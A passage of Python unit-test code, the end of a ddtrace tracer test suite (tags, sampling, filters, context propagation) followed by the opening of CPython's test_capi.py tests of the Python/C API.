assert s.service == "mysvc"
assert s.get_tag("env") == "myenv"
assert s.get_tag("version") == "myvers"
@run_in_subprocess(
env_overrides=dict(
DD_TAGS="service:s,env:e,version:v",
DD_ENV="env",
DD_SERVICE="svc",
DD_VERSION="0.123",
)
)
def test_tags_from_DD_TAGS_precedence(self):
t = ddtrace.Tracer()
with t.trace("test") as s:
assert s.service == "svc"
assert s.get_tag("env") == "env"
assert s.get_tag("version") == "0.123"
@run_in_subprocess(env_overrides=dict(DD_TAGS="service:mysvc,env:myenv,version:myvers"))
def test_tags_from_DD_TAGS_override(self):
t = ddtrace.Tracer()
ddtrace.config.env = "env"
ddtrace.config.service = "service"
ddtrace.config.version = "0.123"
with t.trace("test") as s:
assert s.service == "service"
assert s.get_tag("env") == "env"
assert s.get_tag("version") == "0.123"
def test_tracer_set_runtime_tags():
t = ddtrace.Tracer()
with t.start_span("foobar") as span:
pass
assert len(span.get_tag("runtime-id"))
t2 = ddtrace.Tracer()
with t2.start_span("foobaz") as span2:
pass
assert span.get_tag("runtime-id") == span2.get_tag("runtime-id")
def test_tracer_runtime_tags_fork():
tracer = ddtrace.Tracer()
def task(tracer, q):
span = tracer.start_span("foobaz")
q.put(span.get_tag("runtime-id"))
span.finish()
span = tracer.start_span("foobar")
span.finish()
q = multiprocessing.Queue()
p = multiprocessing.Process(target=task, args=(tracer, q))
p.start()
p.join()
children_tag = q.get()
assert children_tag != span.get_tag("runtime-id")
def test_start_span_hooks():
t = ddtrace.Tracer()
result = {}
@t.on_start_span
def store_span(span):
result["span"] = span
span = t.start_span("hello")
assert span == result["span"]
span.finish()
def test_deregister_start_span_hooks():
t = ddtrace.Tracer()
result = {}
@t.on_start_span
def store_span(span):
result["span"] = span
t.deregister_on_start_span(store_span)
with t.start_span("hello"):
pass
assert result == {}
def test_enable(monkeypatch):
t1 = ddtrace.Tracer()
assert t1.enabled
monkeypatch.setenv("DD_TRACE_ENABLED", "false")
t2 = ddtrace.Tracer()
assert not t2.enabled
def test_runtime_id_parent_only():
tracer = ddtrace.Tracer()
# Parent spans should have runtime-id
s = tracer.trace("test")
rtid = s.get_tag("runtime-id")
assert isinstance(rtid, six.string_types)
# Child spans should not
s2 = tracer.trace("test2")
assert s2.get_tag("runtime-id") is None
s2.finish()
s.finish()
# Parent spans should have runtime-id
s = tracer.trace("test")
s.finish()
rtid = s.get_tag("runtime-id")
assert isinstance(rtid, six.string_types)
def test_runtime_id_fork():
tracer = ddtrace.Tracer()
s = tracer.trace("test")
s.finish()
rtid = s.get_tag("runtime-id")
assert isinstance(rtid, six.string_types)
pid = os.fork()
if pid == 0:
# child
s = tracer.trace("test")
s.finish()
rtid_child = s.get_tag("runtime-id")
assert isinstance(rtid_child, six.string_types)
assert rtid != rtid_child
os._exit(12)
_, status = os.waitpid(pid, 0)
exit_code = os.WEXITSTATUS(status)
assert exit_code == 12
def test_multiple_tracer_ctx():
t1 = ddtrace.Tracer()
t2 = ddtrace.Tracer()
with t1.trace("") as s1:
with t2.trace("") as s2:
pass
assert s2.parent_id == s1.span_id
assert s2.trace_id == s1.trace_id
def test_filters():
t = ddtrace.Tracer()
class FilterAll(object):
def process_trace(self, trace):
return None
t.configure(
settings={
"FILTERS": [FilterAll()],
}
)
t.writer = DummyWriter()
with t.trace("root"):
with t.trace("child"):
pass
spans = t.writer.pop()
assert len(spans) == 0
class FilterMutate(object):
def __init__(self, key, value):
self.key = key
self.value = value
def process_trace(self, trace):
for s in trace:
s.set_tag(self.key, self.value)
return trace
t.configure(
settings={
"FILTERS": [FilterMutate("boop", "beep")],
}
)
t.writer = DummyWriter()
with t.trace("root"):
with t.trace("child"):
pass
spans = t.writer.pop()
assert len(spans) == 2
s1, s2 = spans
assert s1.get_tag("boop") == "beep"
assert s2.get_tag("boop") == "beep"
# Test multiple filters
t.configure(
settings={
"FILTERS": [FilterMutate("boop", "beep"), FilterMutate("mats", "sundin")],
}
)
t.writer = DummyWriter()
with t.trace("root"):
with t.trace("child"):
pass
spans = t.writer.pop()
assert len(spans) == 2
for s in spans:
assert s.get_tag("boop") == "beep"
assert s.get_tag("mats") == "sundin"
class FilterBroken(object):
def process_trace(self, trace):
_ = 1 / 0
t.configure(
settings={
"FILTERS": [FilterBroken()],
}
)
t.writer = DummyWriter()
with t.trace("root"):
with t.trace("child"):
pass
spans = t.writer.pop()
assert len(spans) == 2
t.configure(
settings={
"FILTERS": [FilterMutate("boop", "beep"), FilterBroken()],
}
)
t.writer = DummyWriter()
with t.trace("root"):
with t.trace("child"):
pass
spans = t.writer.pop()
assert len(spans) == 2
for s in spans:
assert s.get_tag("boop") == "beep"
def test_early_exit():
t = ddtrace.Tracer()
t.writer = DummyWriter()
s1 = t.trace("1")
s2 = t.trace("2")
s1.finish()
s2.finish()
assert s1.parent_id is None
assert s2.parent_id is s1.span_id
traces = t.writer.pop_traces()
assert len(traces) == 1
assert len(traces[0]) == 2
s1 = t.trace("1-1")
s1.finish()
assert s1.parent_id is None
s1 = t.trace("1-2")
s1.finish()
assert s1.parent_id is None
class TestPartialFlush(TracerTestCase):
@TracerTestCase.run_in_subprocess(
env_overrides=dict(DD_TRACER_PARTIAL_FLUSH_ENABLED="true", DD_TRACER_PARTIAL_FLUSH_MIN_SPANS="5")
)
def test_partial_flush(self):
root = self.tracer.trace("root")
for i in range(5):
self.tracer.trace("child%s" % i).finish()
traces = self.tracer.writer.pop_traces()
assert len(traces) == 1
assert len(traces[0]) == 5
assert [s.name for s in traces[0]] == ["child0", "child1", "child2", "child3", "child4"]
root.finish()
traces = self.tracer.writer.pop_traces()
assert len(traces) == 1
assert len(traces[0]) == 1
assert traces[0][0].name == "root"
@TracerTestCase.run_in_subprocess(
env_overrides=dict(DD_TRACER_PARTIAL_FLUSH_ENABLED="true", DD_TRACER_PARTIAL_FLUSH_MIN_SPANS="1")
)
def test_partial_flush_too_many(self):
root = self.tracer.trace("root")
for i in range(5):
self.tracer.trace("child%s" % i).finish()
traces = self.tracer.writer.pop_traces()
assert len(traces) == 5
for t in traces:
assert len(t) == 1
assert [t[0].name for t in traces] == ["child0", "child1", "child2", "child3", "child4"]
root.finish()
traces = self.tracer.writer.pop_traces()
assert len(traces) == 1
assert traces[0][0].name == "root"
@TracerTestCase.run_in_subprocess(
env_overrides=dict(DD_TRACER_PARTIAL_FLUSH_ENABLED="true", DD_TRACER_PARTIAL_FLUSH_MIN_SPANS="6")
)
def test_partial_flush_too_few(self):
root = self.tracer.trace("root")
for i in range(5):
self.tracer.trace("child%s" % i).finish()
traces = self.tracer.writer.pop_traces()
assert len(traces) == 0
root.finish()
traces = self.tracer.writer.pop_traces()
assert len(traces) == 1
assert [s.name for s in traces[0]] == ["root", "child0", "child1", "child2", "child3", "child4"]
def test_unicode_config_vals():
t = ddtrace.Tracer()
with override_global_config(dict(version=u"😇", env=u"😇")):
with t.trace("1"):
pass
t.shutdown()
def test_ctx():
tracer = ddtrace.Tracer()
tracer.writer = DummyWriter()
with tracer.trace("test") as s1:
assert tracer.current_span() == s1
assert tracer.current_root_span() == s1
assert tracer.get_call_context().trace_id == s1.trace_id
assert tracer.get_call_context().span_id == s1.span_id
with tracer.trace("test2") as s2:
assert tracer.current_span() == s2
assert tracer.current_root_span() == s1
assert tracer.get_call_context().trace_id == s1.trace_id
assert tracer.get_call_context().span_id == s2.span_id
with tracer.trace("test3") as s3:
assert tracer.current_span() == s3
assert tracer.current_root_span() == s1
assert tracer.get_call_context().trace_id == s1.trace_id
assert tracer.get_call_context().span_id == s3.span_id
assert tracer.get_call_context().trace_id == s1.trace_id
assert tracer.get_call_context().span_id == s2.span_id
with tracer.trace("test4") as s4:
assert tracer.current_span() == s4
assert tracer.current_root_span() == s1
assert tracer.get_call_context().trace_id == s1.trace_id
assert tracer.get_call_context().span_id == s4.span_id
assert tracer.current_span() == s1
assert tracer.current_root_span() == s1
assert tracer.current_span() is None
assert tracer.current_root_span() is None
assert s1.parent_id is None
assert s2.parent_id == s1.span_id
assert s3.parent_id == s2.span_id
assert s4.parent_id == s1.span_id
assert s1.trace_id == s2.trace_id == s3.trace_id == s4.trace_id
assert s1.metrics[SAMPLING_PRIORITY_KEY] == 1
assert SAMPLING_PRIORITY_KEY not in s2.metrics
assert ORIGIN_KEY not in s1.meta
t = tracer.writer.pop_traces()
assert len(t) == 1
assert len(t[0]) == 4
_s1, _s2, _s3, _s4 = t[0]
assert s1 == _s1
assert s2 == _s2
assert s3 == _s3
assert s4 == _s4
with tracer.trace("s") as s:
assert s.parent_id is None
assert s.trace_id != s1.trace_id
def test_multithreaded():
tracer = ddtrace.Tracer()
tracer.writer = DummyWriter()
def target():
with tracer.trace("s1"):
with tracer.trace("s2"):
pass
with tracer.trace("s3"):
pass
for i in range(1000):
ts = [threading.Thread(target=target) for _ in range(10)]
for t in ts:
t.start()
for t in ts:
t.join()
traces = tracer.writer.pop_traces()
assert len(traces) == 10
for trace in traces:
assert len(trace) == 3
def test_ctx_distributed():
tracer = ddtrace.Tracer()
tracer.writer = DummyWriter()
# Test activating an invalid context.
ctx = Context(span_id=None, trace_id=None)
tracer.context_provider.activate(ctx)
assert tracer.current_span() is None
with tracer.trace("test") as s1:
assert tracer.current_span() == s1
assert tracer.current_root_span() == s1
assert tracer.get_call_context().trace_id == s1.trace_id
assert tracer.get_call_context().span_id == s1.span_id
assert s1.parent_id is None
trace = tracer.writer.pop_traces()
assert len(trace) == 1
# Test activating a valid context.
ctx = Context(span_id=1234, trace_id=4321, sampling_priority=2, dd_origin="somewhere")
tracer.context_provider.activate(ctx)
assert tracer.current_span() is None
with tracer.trace("test2") as s2:
assert tracer.current_span() == s2
assert tracer.current_root_span() == s2
assert tracer.get_call_context().trace_id == s2.trace_id == 4321
assert tracer.get_call_context().span_id == s2.span_id
assert s2.parent_id == 1234
trace = tracer.writer.pop_traces()
assert len(trace) == 1
assert s2.metrics[SAMPLING_PRIORITY_KEY] == 2
assert s2.meta[ORIGIN_KEY] == "somewhere"
def test_manual_keep():
tracer = Tracer()
tracer.writer = DummyWriter()
# On a root span
with tracer.trace("asdf") as s:
s.set_tag(MANUAL_KEEP_KEY)
spans = tracer.writer.pop()
assert spans[0].metrics[SAMPLING_PRIORITY_KEY] is priority.USER_KEEP
# On a child span
with tracer.trace("asdf"):
with tracer.trace("child") as s:
s.set_tag(MANUAL_KEEP_KEY)
spans = tracer.writer.pop()
assert spans[0].metrics[SAMPLING_PRIORITY_KEY] is priority.USER_KEEP
def test_manual_keep_then_drop():
tracer = Tracer()
tracer.writer = DummyWriter()
# Test changing the value before finish.
with tracer.trace("asdf") as root:
with tracer.trace("child") as child:
child.set_tag(MANUAL_KEEP_KEY)
root.set_tag(MANUAL_DROP_KEY)
spans = tracer.writer.pop()
assert spans[0].metrics[SAMPLING_PRIORITY_KEY] is priority.USER_REJECT
def test_manual_drop():
tracer = Tracer()
tracer.writer = DummyWriter()
# On a root span
with tracer.trace("asdf") as s:
s.set_tag(MANUAL_DROP_KEY)
spans = tracer.writer.pop()
assert spans[0].metrics[SAMPLING_PRIORITY_KEY] is priority.USER_REJECT
# On a child span
with tracer.trace("asdf"):
with tracer.trace("child") as s:
s.set_tag(MANUAL_DROP_KEY)
spans = tracer.writer.pop()
assert spans[0].metrics[SAMPLING_PRIORITY_KEY] is priority.USER_REJECT
@mock.patch("ddtrace.internal.hostname.get_hostname")
def test_get_report_hostname_enabled(get_hostname):
get_hostname.return_value = "test-hostname"
tracer = Tracer()
tracer.writer = DummyWriter()
with override_global_config(dict(report_hostname=True)):
with tracer.trace("span"):
with tracer.trace("child"):
pass
spans = tracer.writer.pop()
root = spans[0]
child = spans[1]
assert root.get_tag(HOSTNAME_KEY) == "test-hostname"
assert child.get_tag(HOSTNAME_KEY) is None
@mock.patch("ddtrace.internal.hostname.get_hostname")
def test_get_report_hostname_disabled(get_hostname):
get_hostname.return_value = "test-hostname"
tracer = Tracer()
tracer.writer = DummyWriter()
with override_global_config(dict(report_hostname=False)):
with tracer.trace("span"):
with tracer.trace("child"):
pass
spans = tracer.writer.pop()
root = spans[0]
child = spans[1]
assert root.get_tag(HOSTNAME_KEY) is None
assert child.get_tag(HOSTNAME_KEY) is None
@mock.patch("ddtrace.internal.hostname.get_hostname")
def test_get_report_hostname_default(get_hostname):
get_hostname.return_value = "test-hostname"
tracer = Tracer()
tracer.writer = DummyWriter()
with override_global_config(dict(report_hostname=False)):
with tracer.trace("span"):
with tracer.trace("child"):
pass
spans = tracer.writer.pop()
root = spans[0]
child = spans[1]
assert root.get_tag(HOSTNAME_KEY) is None
assert child.get_tag(HOSTNAME_KEY) is None
def test_service_mapping():
@contextlib.contextmanager
def override_service_mapping(service_mapping):
with override_env(dict(DD_SERVICE_MAPPING=service_mapping)):
assert ddtrace.config.service_mapping == {}
ddtrace.config.service_mapping = Config().service_mapping
yield
ddtrace.config.service_mapping = {}
# Test single mapping
with override_service_mapping("foo:bar"), ddtrace.Tracer().trace("renaming", service="foo") as span:
assert span.service == "bar"
# Test multiple mappings
with override_service_mapping("foo:bar,sna:fu"), ddtrace.Tracer().trace("renaming", service="sna") as span:
assert span.service == "fu"
# Test colliding mappings
with override_service_mapping("foo:bar,foo:foobar"), ddtrace.Tracer().trace("renaming", service="foo") as span:
assert span.service == "foobar"
# Test invalid service mapping
with override_service_mapping("foo;bar,sna:fu"):
with ddtrace.Tracer().trace("passthru", service="foo") as _:
assert _.service == "foo"
with ddtrace.Tracer().trace("renaming", "sna") as _:
assert _.service == "fu"
|
test_capi.py | # Run the _testcapi module tests (tests for the Python/C API): by defn,
# these are all functions _testcapi exports whose name begins with 'test_'.
from collections import OrderedDict
import os
import pickle
import random
import re
import subprocess
import sys
import textwrap
import threading
import time
import unittest
import weakref
import importlib.machinery
import importlib.util
from test import support
from test.support import MISSING_C_DOCSTRINGS
from test.support.script_helper import assert_python_failure, assert_python_ok
try:
import _posixsubprocess
except ImportError:
_posixsubprocess = None
# Skip this test if the _testcapi module isn't available.
_testcapi = support.import_module('_testcapi')
import _testinternalcapi
# Were we compiled --with-pydebug or with #define Py_DEBUG?
Py_DEBUG = hasattr(sys, 'gettotalrefcount')
def testfunction(self):
"""some doc"""
return self
class InstanceMethod:
id = _testcapi.instancemethod(id)
testfunction = _testcapi.instancemethod(testfunction)
class CAPITest(unittest.TestCase):
def test_instancemethod(self):
inst = InstanceMethod()
self.assertEqual(id(inst), inst.id())
self.assertTrue(inst.testfunction() is inst)
self.assertEqual(inst.testfunction.__doc__, testfunction.__doc__)
self.assertEqual(InstanceMethod.testfunction.__doc__, testfunction.__doc__)
InstanceMethod.testfunction.attribute = "test"
self.assertEqual(testfunction.attribute, "test")
self.assertRaises(AttributeError, setattr, inst.testfunction, "attribute", "test")
def test_no_FatalError_infinite_loop(self):
with support.SuppressCrashReport():
p = subprocess.Popen([sys.executable, "-c",
'import _testcapi;'
'_testcapi.crash_no_current_thread()'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
(out, err) = p.communicate()
self.assertEqual(out, b'')
# This used to cause an infinite loop.
self.assertTrue(err.rstrip().startswith(
b'Fatal Python error: '
b'PyThreadState_Get: '
b'the function must be called with the GIL held, '
b'but the GIL is released '
b'(the current Python thread state is NULL)'),
err)
def test_memoryview_from_NULL_pointer(self):
self.assertRaises(ValueError, _testcapi.make_memoryview_from_NULL_pointer)
def test_exc_info(self):
raised_exception = ValueError("5")
new_exc = TypeError("TEST")
try:
raise raised_exception
except ValueError as e:
tb = e.__traceback__
orig_sys_exc_info = sys.exc_info()
orig_exc_info = _testcapi.set_exc_info(new_exc.__class__, new_exc, None)
new_sys_exc_info = sys.exc_info()
new_exc_info = _testcapi.set_exc_info(*orig_exc_info)
reset_sys_exc_info = sys.exc_info()
self.assertEqual(orig_exc_info[1], e)
self.assertSequenceEqual(orig_exc_info, (raised_exception.__class__, raised_exception, tb))
self.assertSequenceEqual(orig_sys_exc_info, orig_exc_info)
self.assertSequenceEqual(reset_sys_exc_info, orig_exc_info)
self.assertSequenceEqual(new_exc_info, (new_exc.__class__, new_exc, None))
self.assertSequenceEqual(new_sys_exc_info, new_exc_info)
else:
self.assertTrue(False)
@unittest.skipUnless(_posixsubprocess, '_posixsubprocess required for this test.')
def test_seq_bytes_to_charp_array(self):
# Issue #15732: crash in _PySequence_BytesToCharpArray()
class Z(object):
def __len__(self):
return 1
self.assertRaises(TypeError, _posixsubprocess.fork_exec,
1,Z(),3,(1, 2),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21)
# Issue #15736: overflow in _PySequence_BytesToCharpArray()
class Z(object):
def __len__(self):
return sys.maxsize
def __getitem__(self, i):
return b'x'
self.assertRaises(MemoryError, _posixsubprocess.fork_exec,
1,Z(),3,(1, 2),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21)
@unittest.skipUnless(_posixsubprocess, '_posixsubprocess required for this test.')
def test_subprocess_fork_exec(self):
class Z(object):
def __len__(self):
return 1
# Issue #15738: crash in subprocess_fork_exec()
self.assertRaises(TypeError, _posixsubprocess.fork_exec,
Z(),[b'1'],3,(1, 2),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21)
@unittest.skipIf(MISSING_C_DOCSTRINGS,
"Signature information for builtins requires docstrings")
def test_docstring_signature_parsing(self):
self.assertEqual(_testcapi.no_docstring.__doc__, None)
self.assertEqual(_testcapi.no_docstring.__text_signature__, None)
self.assertEqual(_testcapi.docstring_empty.__doc__, None)
self.assertEqual(_testcapi.docstring_empty.__text_signature__, None)
self.assertEqual(_testcapi.docstring_no_signature.__doc__,
"This docstring has no signature.")
self.assertEqual(_testcapi.docstring_no_signature.__text_signature__, None)
self.assertEqual(_testcapi.docstring_with_invalid_signature.__doc__,
"docstring_with_invalid_signature($module, /, boo)\n"
"\n"
"This docstring has an invalid signature."
)
self.assertEqual(_testcapi.docstring_with_invalid_signature.__text_signature__, None)
self.assertEqual(_testcapi.docstring_with_invalid_signature2.__doc__,
"docstring_with_invalid_signature2($module, /, boo)\n"
"\n"
"--\n"
"\n"
"This docstring also has an invalid signature."
)
self.assertEqual(_testcapi.docstring_with_invalid_signature2.__text_signature__, None)
self.assertEqual(_testcapi.docstring_with_signature.__doc__,
"This docstring has a valid signature.")
self.assertEqual(_testcapi.docstring_with_signature.__text_signature__, "($module, /, sig)")
self.assertEqual(_testcapi.docstring_with_signature_but_no_doc.__doc__, None)
self.assertEqual(_testcapi.docstring_with_signature_but_no_doc.__text_signature__,
"($module, /, sig)")
self.assertEqual(_testcapi.docstring_with_signature_and_extra_newlines.__doc__,
"\nThis docstring has a valid signature and some extra newlines.")
self.assertEqual(_testcapi.docstring_with_signature_and_extra_newlines.__text_signature__,
"($module, /, parameter)")
def test_c_type_with_matrix_multiplication(self):
M = _testcapi.matmulType
m1 = M()
m2 = M()
self.assertEqual(m1 @ m2, ("matmul", m1, m2))
self.assertEqual(m1 @ 42, ("matmul", m1, 42))
self.assertEqual(42 @ m1, ("matmul", 42, m1))
o = m1
o @= m2
self.assertEqual(o, ("imatmul", m1, m2))
o = m1
o @= 42
self.assertEqual(o, ("imatmul", m1, 42))
o = 42
o @= m1
self.assertEqual(o, ("matmul", 42, m1))
def test_c_type_with_ipow(self):
# When the __ipow__ method of a type was implemented in C, using the
# modulo param would cause segfaults.
o = _testcapi.ipowType()
self.assertEqual(o.__ipow__(1), (1, None))
self.assertEqual(o.__ipow__(2, 2), (2, 2))
def test_return_null_without_error(self):
# Issue #23571: A function must not return NULL without setting an
# error
if Py_DEBUG:
code = textwrap.dedent("""
import _testcapi
from test import support
with support.SuppressCrashReport():
_testcapi.return_null_without_error()
""")
rc, out, err = assert_python_failure('-c', code)
self.assertRegex(err.replace(b'\r', b''),
br'Fatal Python error: _Py_CheckFunctionResult: '
br'a function returned NULL '
br'without setting an error\n'
br'Python runtime state: initialized\n'
br'SystemError: <built-in function '
br'return_null_without_error> returned NULL '
br'without setting an error\n'
br'\n'
br'Current thread.*:\n'
br' File .*", line 6 in <module>')
else:
with self.assertRaises(SystemError) as cm:
_testcapi.return_null_without_error()
self.assertRegex(str(cm.exception),
'return_null_without_error.* '
'returned NULL without setting an error')
def test_return_result_with_error(self):
# Issue #23571: A function must not return a result with an error set
if Py_DEBUG:
code = textwrap.dedent("""
import _testcapi
from test import support
with support.SuppressCrashReport():
_testcapi.return_result_with_error()
""")
rc, out, err = assert_python_failure('-c', code)
self.assertRegex(err.replace(b'\r', b''),
br'Fatal Python error: _Py_CheckFunctionResult: '
br'a function returned a result '
br'with an error set\n'
br'Python runtime state: initialized\n'
br'ValueError\n'
br'\n'
br'The above exception was the direct cause '
br'of the following exception:\n'
br'\n'
br'SystemError: <built-in '
br'function return_result_with_error> '
br'returned a result with an error set\n'
br'\n'
br'Current thread.*:\n'
br' File .*, line 6 in <module>')
else:
with self.assertRaises(SystemError) as cm:
_testcapi.return_result_with_error()
self.assertRegex(str(cm.exception),
'return_result_with_error.* '
'returned a result with an error set')
def test_buildvalue_N(self):
_testcapi.test_buildvalue_N()
def test_set_nomemory(self):
code = """if 1:
import _testcapi
class C(): pass
# The first loop tests both functions and that remove_mem_hooks()
# can be called twice in a row. The second loop checks a call to
# set_nomemory() after a call to remove_mem_hooks(). The third
# loop checks the start and stop arguments of set_nomemory().
for outer_cnt in range(1, 4):
start = 10 * outer_cnt
for j in range(100):
if j == 0:
if outer_cnt != 3:
_testcapi.set_nomemory(start)
else:
_testcapi.set_nomemory(start, start + 1)
try:
C()
except MemoryError as e:
if outer_cnt != 3:
_testcapi.remove_mem_hooks()
print('MemoryError', outer_cnt, j)
_testcapi.remove_mem_hooks()
break
"""
rc, out, err = assert_python_ok('-c', code)
self.assertIn(b'MemoryError 1 10', out)
self.assertIn(b'MemoryError 2 20', out)
self.assertIn(b'MemoryError 3 30', out)
def test_mapping_keys_values_items(self):
class Mapping1(dict):
def keys(self):
return list(super().keys())
def values(self):
return list(super().values())
def items(self):
return list(super().items())
class Mapping2(dict):
def keys(self):
return tuple(super().keys())
def values(self):
return tuple(super().values())
def items(self):
return tuple(super().items())
dict_obj = {'foo': 1, 'bar': 2, 'spam': 3}
for mapping in [{}, OrderedDict(), Mapping1(), Mapping2(),
dict_obj, OrderedDict(dict_obj),
Mapping1(dict_obj), Mapping2(dict_obj)]:
self.assertListEqual(_testcapi.get_mapping_keys(mapping),
list(mapping.keys()))
self.assertListEqual(_testcapi.get_mapping_values(mapping),
list(mapping.values()))
self.assertListEqual(_testcapi.get_mapping_items(mapping),
list(mapping.items()))
def test_mapping_keys_values_items_bad_arg(self):
self.assertRaises(AttributeError, _testcapi.get_mapping_keys, None)
self.assertRaises(AttributeError, _testcapi.get_mapping_values, None)
self.assertRaises(AttributeError, _testcapi.get_mapping_items, None)
class BadMapping:
def keys(self):
return None
def values(self):
return None
def items(self):
return None
bad_mapping = BadMapping()
self.assertRaises(TypeError, _testcapi.get_mapping_keys, bad_mapping)
self.assertRaises(TypeError, _testcapi.get_mapping_values, bad_mapping)
self.assertRaises(TypeError, _testcapi.get_mapping_items, bad_mapping)
@unittest.skipUnless(hasattr(_testcapi, 'negative_refcount'),
'need _testcapi.negative_refcount')
def test_negative_refcount(self):
# bpo-35059: Check that Py_DECREF() reports the correct filename
# when calling _Py_NegativeRefcount() to abort Python.
code = textwrap.dedent("""
import _testcapi
from test import support
with support.SuppressCrashReport():
_testcapi.negative_refcount()
""")
rc, out, err = assert_python_failure('-c', code)
self.assertRegex(err,
br'_testcapimodule\.c:[0-9]+: '
br'_Py_NegativeRefcount: Assertion failed: '
br'object has negative ref count')
def test_trashcan_subclass(self):
# bpo-35983: Check that the trashcan mechanism for "list" is NOT
# activated when its tp_dealloc is being called by a subclass
from _testcapi import MyList
L = None
for i in range(1000):
L = MyList((L,))
@support.requires_resource('cpu')
def test_trashcan_python_class1(self):
self.do_test_trashcan_python_class(list)
@support.requires_resource('cpu')
def test_trashcan_python_class2(self):
from _testcapi import MyList
self.do_test_trashcan_python_class(MyList)
def do_test_trashcan_python_class(self, base):
# Check that the trashcan mechanism works properly for a Python
# subclass of a class using the trashcan (this specific test assumes
# that the base class "base" behaves like list)
class PyList(base):
# Count the number of PyList instances to verify that there is
# no memory leak
num = 0
def __init__(self, *args):
__class__.num += 1
super().__init__(*args)
def __del__(self):
__class__.num -= 1
for parity in (0, 1):
L = None
# We need in the order of 2**20 iterations here such that a
# typical 8MB stack would overflow without the trashcan.
for i in range(2**20):
L = PyList((L,))
L.attr = i
if parity:
# Add one additional nesting layer
L = (L,)
self.assertGreater(PyList.num, 0)
del L
self.assertEqual(PyList.num, 0)
def test_subclass_of_heap_gc_ctype_with_tpdealloc_decrefs_once(self):
class HeapGcCTypeSubclass(_testcapi.HeapGcCType):
def __init__(self):
self.value2 = 20
super().__init__()
subclass_instance = HeapGcCTypeSubclass()
type_refcnt = sys.getrefcount(HeapGcCTypeSubclass)
# Test that subclass instance was fully created
self.assertEqual(subclass_instance.value, 10)
self.assertEqual(subclass_instance.value2, 20)
# Test that the type reference count is only decremented once
del subclass_instance
self.assertEqual(type_refcnt - 1, sys.getrefcount(HeapGcCTypeSubclass))
def test_subclass_of_heap_gc_ctype_with_del_modifying_dunder_class_only_decrefs_once(self):
class A(_testcapi.HeapGcCType):
def __init__(self):
self.value2 = 20
super().__init__()
class B(A):
def __init__(self):
super().__init__()
def __del__(self):
self.__class__ = A
A.refcnt_in_del = sys.getrefcount(A)
B.refcnt_in_del = sys.getrefcount(B)
subclass_instance = B()
type_refcnt = sys.getrefcount(B)
new_type_refcnt = sys.getrefcount(A)
# Test that subclass instance was fully created
self.assertEqual(subclass_instance.value, 10)
self.assertEqual(subclass_instance.value2, 20)
del subclass_instance
# Test that setting __class__ modified the reference counts of the types
self.assertEqual(type_refcnt - 1, B.refcnt_in_del)
self.assertEqual(new_type_refcnt + 1, A.refcnt_in_del)
# Test that the original type already has decreased its refcnt
self.assertEqual(type_refcnt - 1, sys.getrefcount(B))
# Test that subtype_dealloc decref the newly assigned __class__ only once
self.assertEqual(new_type_refcnt, sys.getrefcount(A))
def test_heaptype_with_dict(self):
inst = _testcapi.HeapCTypeWithDict()
inst.foo = 42
self.assertEqual(inst.foo, 42)
self.assertEqual(inst.dictobj, inst.__dict__)
self.assertEqual(inst.dictobj, {"foo": 42})
inst = _testcapi.HeapCTypeWithDict()
self.assertEqual({}, inst.__dict__)
def test_heaptype_with_negative_dict(self):
inst = _testcapi.HeapCTypeWithNegativeDict()
inst.foo = 42
self.assertEqual(inst.foo, 42)
self.assertEqual(inst.dictobj, inst.__dict__)
self.assertEqual(inst.dictobj, {"foo": 42})
inst = _testcapi.HeapCTypeWithNegativeDict()
self.assertEqual({}, inst.__dict__)
def test_heaptype_with_weakref(self):
inst = _testcapi.HeapCTypeWithWeakref()
ref = weakref.ref(inst)
self.assertEqual(ref(), inst)
self.assertEqual(inst.weakreflist, ref)
def test_heaptype_with_buffer(self):
inst = _testcapi.HeapCTypeWithBuffer()
b = bytes(inst)
self.assertEqual(b, b"1234")
def test_c_subclass_of_heap_ctype_with_tpdealloc_decrefs_once(self):
subclass_instance = _testcapi.HeapCTypeSubclass()
type_refcnt = sys.getrefcount(_testcapi.HeapCTypeSubclass)
# Test that subclass instance was fully created
self.assertEqual(subclass_instance.value, 10)
self.assertEqual(subclass_instance.value2, 20)
# Test that the type reference count is only decremented once
del subclass_instance
self.assertEqual(type_refcnt - 1, sys.getrefcount(_testcapi.HeapCTypeSubclass))
def test_c_subclass_of_heap_ctype_with_del_modifying_dunder_class_only_decrefs_once(self):
subclass_instance = _testcapi.HeapCTypeSubclassWithFinalizer()
type_refcnt = sys.getrefcount(_testcapi.HeapCTypeSubclassWithFinalizer)
new_type_refcnt = sys.getrefcount(_testcapi.HeapCTypeSubclass)
# Test that subclass instance was fully created
self.assertEqual(subclass_instance.value, 10)
self.assertEqual(subclass_instance.value2, 20)
# The tp_finalize slot will set __class__ to HeapCTypeSubclass
del subclass_instance
# Test that setting __class__ modified the reference counts of the types
self.assertEqual(type_refcnt - 1, _testcapi.HeapCTypeSubclassWithFinalizer.refcnt_in_del)
self.assertEqual(new_type_refcnt + 1, _testcapi.HeapCTypeSubclass.refcnt_in_del)
# Test that the original type already has decreased its refcnt
self.assertEqual(type_refcnt - 1, sys.getrefcount(_testcapi.HeapCTypeSubclassWithFinalizer))
# Test that subtype_dealloc decref the newly assigned __class__ only once
self.assertEqual(new_type_refcnt, sys.getrefcount(_testcapi.HeapCTypeSubclass))
def test_heaptype_with_setattro(self):
obj = _testcapi.HeapCTypeSetattr()
self.assertEqual(obj.pvalue, 10)
obj.value = 12
self.assertEqual(obj.pvalue, 12)
del obj.value
self.assertEqual(obj.pvalue, 0)
def test_pynumber_tobase(self):
from _testcapi import pynumber_tobase
self.assertEqual(pynumber_tobase(123, 2), '0b1111011')
self.assertEqual(pynumber_tobase(123, 8), '0o173')
self.assertEqual(pynumber_tobase(123, 10), '123')
self.assertEqual(pynumber_tobase(123, 16), '0x7b')
self.assertEqual(pynumber_tobase(-123, 2), '-0b1111011')
self.assertEqual(pynumber_tobase(-123, 8), '-0o173')
self.assertEqual(pynumber_tobase(-123, 10), '-123')
self.assertEqual(pynumber_tobase(-123, 16), '-0x7b')
self.assertRaises(TypeError, pynumber_tobase, 123.0, 10)
self.assertRaises(TypeError, pynumber_tobase, '123', 10)
self.assertRaises(SystemError, pynumber_tobase, 123, 0)
class TestPendingCalls(unittest.TestCase):
def pendingcalls_submit(self, l, n):
def callback():
#this function can be interrupted by thread switching so let's
#use an atomic operation
l.append(None)
for i in range(n):
time.sleep(random.random()*0.02) #0.01 secs on average
#try submitting callback until successful.
#rely on regular interrupt to flush queue if we are
#unsuccessful.
while True:
